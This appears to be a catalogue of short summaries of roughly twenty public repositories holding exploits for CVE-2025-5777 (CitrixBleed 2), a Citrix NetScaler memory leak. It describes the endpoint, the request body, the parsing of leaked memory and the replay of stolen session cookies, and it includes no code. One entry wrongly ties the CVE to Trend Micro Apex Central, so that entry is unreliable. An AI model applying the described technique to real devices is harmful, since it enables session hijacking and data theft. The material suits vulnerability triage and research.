CitrixBleed 2

This repository is a very small proof-of-concept exploit for CVE-2025-5777, described as a Citrix NetScaler memory leak ('Citrixbleed 2'). It contains only two files: a minimal README and a single Python script, poc.py, which is the sole functional component and clear entry point. The exploit is a network-based asynchronous PoC written in Python using aiohttp, asyncio, argparse, regex parsing, and colorized console output via colorama. The operator provides a base URL for a suspected Citrix target. The script appends the fixed path /p/u/doAuthentication.do and repeatedly issues concurrent HTTP POST requests with body data 'login' and a crafted User-Agent header ('CloudSEKPoc' repeated 10 times). SSL verification is explicitly disabled, and an optional HTTP proxy can be used. Its main capability is information disclosure extraction, not remote code execution. After each response, the script checks for HTTP 200 and scans the body for an <InitialValue>...</InitialValue> tag. If found, it treats the enclosed content as leaked memory-derived data and prints it as a hex/ascii dump. The script performs an initial round of requests to determine whether leakage is observed; if not, it stops and reports the target is likely not vulnerable. If leakage is detected once, it continues looping to extract more data until interrupted. Repository structure and purpose: - README.md: only identifies the repo as 'Citrixbleed2-CVE-2025-5777' and 'POC'. - poc.py: full exploit logic, including signal handling, concurrent request generation, response parsing, leak detection state tracking, and CLI argument handling. Overall, this is a genuine PoC exploit for a memory disclosure vulnerability in Citrix NetScaler/ADC/Gateway authentication handling. It is not merely a detector because it actively attempts to trigger and retrieve leaked content, though it remains a basic proof-of-concept rather than a weaponized framework module.

Repository contains a single Python proof-of-concept exploit script (citrixbleed2.py) plus a README describing 'CitrixBleed 2' (CVE-2025-5777) as a remote, unauthenticated memory disclosure affecting Citrix NetScaler ADC/Gateway. Code behavior (citrixbleed2.py): - Takes a target base URL from the command line (e.g., https://target) and constructs a fixed endpoint: /p/u/doAuthentication.do. - Sends up to 100 HTTPS POST requests (verify=False, timeout=5) with a deliberately long User-Agent string ("GROKCTF" repeated 50 times) as a marker, Content-Length set to 5, and Connection: keep-alive; body is the bytes string "login". - Parses each response body for XML-like tags <InitialValue>...</InitialValue> and prints the extracted content as "RAW LEAK" (truncated to 200 chars for display). - Applies simple heuristics to highlight potentially interesting leaked data (strings containing '{' / 'flag{' or strings longer than 30 chars as possible tokens/sessions). Overall purpose: a network-based PoC intended to demonstrate/harvest memory disclosure artifacts from a vulnerable Citrix authentication endpoint by repeatedly issuing crafted requests and extracting leaked values from the server response.

This repository contains a proof-of-concept (PoC) exploit for CVE-2025-5777, a critical memory disclosure vulnerability affecting Citrix NetScaler ADC and NetScaler Gateway devices prior to the June/July 2025 patches. The exploit is implemented in a single Python script (CVE-2025-5777.py) and is accompanied by a detailed README.md that explains the vulnerability, affected products, impact, and usage instructions. The exploit works by sending repeated malformed POST requests to the /p/u/doAuthentication.do endpoint of a target NetScaler device. The server's response is parsed for an <InitialValue> XML tag, which may contain leaked memory data. The script displays this data in a hex-dump format, similar to the output of the xxd tool. The exploit supports optional proxying, threading, and verbose output for analysis. No authentication is required to exploit the vulnerability, making it highly critical. The README provides context, usage instructions, and sample output, demonstrating the ability to leak sensitive memory contents such as session tokens and credentials. The repository is structured simply, with one exploit script and one documentation file, and is intended for educational and research purposes only.

This repository provides a comprehensive exploit and scanner for CVE-2025-5777, a critical memory disclosure vulnerability in Citrix NetScaler ADC and Gateway products. The main exploit script, 'cve5777expolit.py', is a Python 3 tool that uses asynchronous requests (aiohttp) to target the /p/u/doAuthentication.do endpoint on Citrix NetScaler devices. By sending a crafted POST request with the body 'login', the script attempts to trigger a memory leak, then parses the response for sensitive data, including session cookies (notably NSC_AAAC), usernames, and other human-readable strings. Extracted leaks are displayed and saved to 'leaks.txt'. The tool supports scanning single or multiple targets, uses concurrency for speed, and highlights high-impact findings. The repository also includes a .bcheck script and a Nuclei-compatible YAML file for detection, as well as a detailed README.md explaining the vulnerability, usage, and references. The exploit is operational, providing both detection and practical exploitation capabilities for authorized testing of Citrix NetScaler devices vulnerable to CVE-2025-5777.

This repository contains an advanced Python exploit script (exploit.py) targeting CVE-2025-5777, a memory leak vulnerability in Citrix NetScaler appliances. The exploit abuses improper handling of malformed POST data to leak uninitialized stack memory via the <InitialValue> tag in XML responses from authentication endpoints (notably /p/u/doAuthentication.do and optionally /api/auth). The script is highly automated: it supports concurrency, proxying, rate limiting, and can test multiple endpoints. It detects and highlights sensitive data patterns (session tokens, credentials, IPs, emails, etc.), tracks statistics, and saves results in various formats (JSON, CSV, raw text). The README provides detailed usage instructions, options, and describes the impact and mitigation. The repository structure is simple: a disclaimer, a comprehensive README, and the exploit script. The exploit is operational and can be used to extract sensitive data from vulnerable Citrix NetScaler instances.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-5777, a memory disclosure vulnerability (dubbed 'CitrixBleed 2') affecting Citrix NetScaler Gateway and AAA Virtual Server. The repository contains three files: a Bash script (CVE-2025-5777.sh) that demonstrates the exploit, a README.md with detailed usage instructions and background, and a LICENSE file. The exploit works by sending a specially crafted POST request to the '/p/u/doAuthentication.do' endpoint of a target Citrix device over HTTPS, leveraging insufficient input validation and a TOCTOU race condition to leak memory contents. The README provides context on asset discovery, exploitation methodology, and references for further research. The exploit is unauthenticated and external, requiring only the target domain as input. If successful, it may expose sensitive information such as session cookies or credentials from the target's memory.

This repository provides a Python-based proof-of-concept exploit for CVE-2025-5777, a memory leak vulnerability in Citrix NetScaler. The main file, CVE-2025-5777.py, is a command-line tool that sends repeated POST requests to the /p/u/doAuthentication.do endpoint of a specified Citrix NetScaler device. If the device is vulnerable, the script extracts and displays leaked memory data found within the <InitialValue> XML tag in the HTTP response. The script includes features for verbose output, proxy support, IPv4-only mode, and improved error handling for DNS and URL format issues. The README.md provides usage instructions and context, while requirements.txt lists the necessary Python dependencies (aiohttp and colorama). The exploit demonstrates the vulnerability by leaking memory but does not provide weaponized or post-exploitation capabilities.

This repository provides an operational exploit for CVE-2025-5777, a vulnerability affecting Citrix NetScaler VPN. The main script, exploit.py, is an asynchronous Python tool that targets Citrix VPN endpoints by sending POST requests to the /p/u/doAuthentication.do path. It analyzes the responses for leaked authentication tokens (including <InitialValue> tags, NSC_AAAC cookies, and JWTs), internal IP addresses, and hidden or internal VPN paths. The tool can also validate the extracted tokens by attempting to access several protected paths (such as /vpn/index.html and /Citrix/StoreWeb/) using the tokens as cookies. The output can be saved in JSON format or to a file, and the tool supports proxying through Burp Suite or SOCKS proxies. The repository is structured with a single main exploit script (exploit.py), a requirements.txt for dependencies, and a detailed README.md explaining usage, features, and legal disclaimers. The exploit is intended for educational and authorized research use only.

This repository contains a single Python script, 'exploit.py', which is a proof-of-concept exploit for CVE-2025-5777, a memory leak vulnerability in Citrix NetScaler devices. The script uses asynchronous HTTP POST requests to the '/p/u/doAuthentication.do' endpoint on a target NetScaler device, attempting to trigger a memory disclosure. It parses the response for leaked data, specifically looking for <InitialValue> tags, and displays the extracted memory contents in a hex dump format. The script supports multithreading, proxy configuration, and verbose output. It is intended for educational and testing purposes, and requires the user to supply the base URL of the target device. The exploit demonstrates the vulnerability by extracting sensitive memory data if the target is affected.

This repository contains a proof-of-concept (PoC) exploit for CVE-2025-5777, a critical authentication bypass and remote code execution vulnerability in Trend Micro Apex Central (versions prior to Patch 2379). The exploit is implemented in a single Python script ('cve-2025-5777-poc.py'), which sends a crafted HTTP POST request to the vulnerable endpoint '/TrendMicro/EndpointBaseCamp/UI/Login.aspx' on the target system. The payload includes a 'cmd' parameter that is injected into the request, allowing the attacker to execute arbitrary system commands with SYSTEM/root privileges. The script checks the response for evidence of successful command execution (e.g., output from the 'ping' command). No authentication is required, and the attack is performed remotely over the network. The repository also includes a README with detailed usage instructions, mitigation advice, and references. No hardcoded IP addresses or external domains are present in the code; the target URL and command are provided as script arguments. The exploit is a functional PoC and not weaponized for mass exploitation.

This repository provides a comprehensive exploit and scanner for CVE-2025-5777 (CitrixBleed 2), a critical memory disclosure vulnerability in Citrix NetScaler ADC and Gateway products. The main exploit script, 'exploitveer.py', is a Python 3 tool that uses asynchronous requests (aiohttp) to target the vulnerable authentication endpoint '/p/u/doAuthentication.do' on Citrix NetScaler devices. By sending a crafted POST request with the body 'login', the script triggers the vulnerability, causing the server to leak memory contents within an <InitialValue> tag in the response. The script then parses the leaked data, extracting human-readable strings and searching for sensitive patterns such as session cookies (NSC_AAAC), credentials, and MFA tokens. All findings are displayed to the user and saved in 'leaks.txt' for further analysis. The tool supports both single-target and multi-target scanning, can operate through a proxy, and offers a check-only mode for quick vulnerability assessment. The repository also includes detection scripts in .bcheck and .yaml formats for integration with automated scanners, as well as a detailed README with usage instructions, references, and search dorks for identifying potential targets. The exploit is operational, providing real-world impact demonstration and data extraction capabilities.

This repository contains a Python proof-of-concept exploit for CVE-2025-5777, targeting a Citrix authentication endpoint. The main file, CVE‑2025‑5777.py, sends a POST request with the body 'login' to the /p/u/doAuthentication.do endpoint of a specified target. If the response is XML with a specific Content-Type, the script extracts the <InitialValue> field, decodes it from base64, and prints its contents in both hex and ASCII formats. The exploit then repeats the request 20 more times, likely to gather additional data or tokens. The script supports both single-target and list-based modes. The README provides usage instructions and a sample HTTP request. No hardcoded IPs or domains are present; the endpoint is relative and must be supplied by the user. The exploit is a POC and does not provide a weaponized payload, but it demonstrates the ability to extract potentially sensitive authentication data from vulnerable Citrix systems.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-5777, a critical memory disclosure vulnerability in Citrix NetScaler ADC and Gateway appliances. The main exploit is implemented in 'CVE-2025-5777.py', a Python script that uses asynchronous HTTP POST requests to the '/p/u/doAuthentication.do' endpoint on the target system. If the target is vulnerable, the response will contain leaked memory, specifically within an <InitialValue> XML tag, which the script extracts and displays as a hex dump. The script supports concurrency, proxying, and verbose output. The included YAML file ('CVE-2025-5777.yaml') is a nuclei template for automated scanning of the same vulnerability. The repository is structured with a README providing usage instructions, a LICENSE, and standard .gitignore. The exploit is a functional PoC, not weaponized, and is intended for authorized security testing only.

This repository contains a proof-of-concept exploit for CVE-2025-5777 (CitrixBleed 2), a critical memory disclosure vulnerability in Citrix NetScaler ADC/Gateway devices. The main exploit script, 'citrix_memory_leak.py', is a standalone Python 3 tool that sends a malformed POST request to the '/p/u/doAuthentication.do' endpoint of a target Citrix device. If the device is vulnerable, the response will contain leaked memory within an <InitialValue> XML tag, which the script extracts and displays as a hex+ASCII dump. The exploit is asynchronous, supports up to 10 requests per run, and provides colored terminal output for clarity. The repository also includes a README with usage instructions, mitigation advice, and references, as well as a detailed legal disclaimer. No hardcoded targets or credentials are present; the user must supply the target URL. The exploit is intended for authorized security testing and educational purposes only.

This repository contains a PowerShell proof-of-concept exploit for CVE-2025-5777. The main file, 'powershell-poc', is an interactive script that prompts the user for a target URL and an output filename. It repeatedly sends POST requests to the /p/u/doAuthentication.do endpoint of the specified URL, attempting to extract data enclosed in <InitialValue>...</InitialValue> tags from the server's response. Any extracted data is saved to a local file (default: leak.dump). The script is designed for internal testing and demonstrates the vulnerability by leaking potentially sensitive information from the target application. The repository structure is minimal, consisting of a README and the exploit script.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-5777, a memory leak vulnerability in Citrix NetScaler appliances. The exploit is implemented in a single Python script ('exploit.py'), which sends repeated malformed HTTP POST requests to the '/p/u/doAuthentication.do' endpoint of a target NetScaler device. The POST data consists solely of the string 'login', which, due to improper parsing on the target, causes the server to return a portion of uninitialized stack memory within the <InitialValue> tag of the XML response. The script parses these responses and displays the leaked memory in a hex-dump format, potentially exposing sensitive information such as session tokens, credentials, and other in-memory data. The repository also includes a README.md with detailed usage instructions, impact analysis, and references, as well as a legal disclaimer. The exploit is intended for educational and research purposes only and is not weaponized; it serves as a PoC to demonstrate the vulnerability and assist in detection and analysis.

This repository provides a proof-of-concept (POC) and a checker script for exploiting CVE-2025-5777, a vulnerability in Citrix ADC / Gateway devices. The main files are 'checker.py' and 'poc.py'. - 'checker.py' is a multi-threaded script that takes a list of target hosts and checks if they are vulnerable by sending POST requests to '/p/u/doAuthentication.do' and analyzing the response for specific XML tags. It writes vulnerable hosts to an output file. - 'poc.py' is a more advanced exploit that can target a single URL or a list of URLs. It attempts to dump memory from the target by exploiting the same endpoint, parses the response for session tokens, and tests if these tokens are valid by using them as cookies in requests to '/logon/LogonPoint/Authentication/GetUserName'. If successful, it reports the vulnerability and any valid session tokens/usernames found. The repository includes requirements files for dependencies and an OpenSSL configuration file to enable legacy renegotiation if needed. The exploit is operational and can be used to confirm vulnerability and extract sensitive session information from affected Citrix devices.

This repository is a proof-of-concept exploit for CVE-2025-5777 (CitrixBleed 2), an out-of-bounds read vulnerability in the login process of Citrix Gateway. The main script (main.py) is a Python program that takes a target URL and optional parameters for threading and output file. It sends crafted POST requests to the /p/u/doAuthentication.do endpoint of the target Citrix Gateway, attempting to trigger the vulnerability and extract memory contents. The script uses multithreading to increase the rate of exploitation and writes any leaked memory data to a specified output file, displaying progress in the terminal. The exploit is not weaponized but demonstrates the vulnerability and potential for sensitive data leakage. The repository includes a README with usage instructions and a requirements.txt listing necessary Python packages.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-5777, a critical unauthenticated out-of-bounds read vulnerability in Citrix NetScaler ADC and Gateway appliances. The main exploit script, 'CVE-2025-5777.py', sends 100 concurrent POST requests with a minimal body ('login') to the '/p/u/doAuthentication.do' endpoint of a specified target host over HTTPS. If the target is vulnerable, the response may contain leaked memory between <InitialValue>...</InitialValue> tags, which the script extracts and saves as binary files for further analysis. The exploit does not require authentication and targets unpatched Citrix NetScaler systems, potentially exposing sensitive information such as session tokens. The repository also includes 'ns_log_scanner.py', a utility script for analyzing Citrix NetScaler log files to detect non-text (binary) data, which may indicate exploitation or memory leaks. The README provides detailed background on the vulnerability, affected versions, detection strategies (including example Snort and Fortigate IPS rules), and usage instructions for both scripts. The overall structure is clear, with the main exploit and a supporting detection tool, both written in Python. No hardcoded IPs or domains are present; the exploit requires the user to specify the target host.

This repository provides a comprehensive exploitation toolkit and documentation for CVE-2025-5777 (CitrixBleed 2), an out-of-bounds memory read vulnerability in Citrix NetScaler ADC and Gateway. The repository contains three files: a detailed README.md (with technical background, exploitation details, and references), poc.py (a proof-of-concept script that triggers the vulnerability and extracts leaked memory, including session cookies), and exp.py (an exploit script that replays leaked session cookies to gain unauthorized access to the target's VPN portal). The main attack vector is network-based, requiring only HTTPS access to the vulnerable endpoint. The PoC and exploit scripts are written in Python and are operational, providing both memory leakage and session hijacking capabilities. No detection-only scripts are present; both code files are offensive in nature. The repository is not part of a known exploit framework.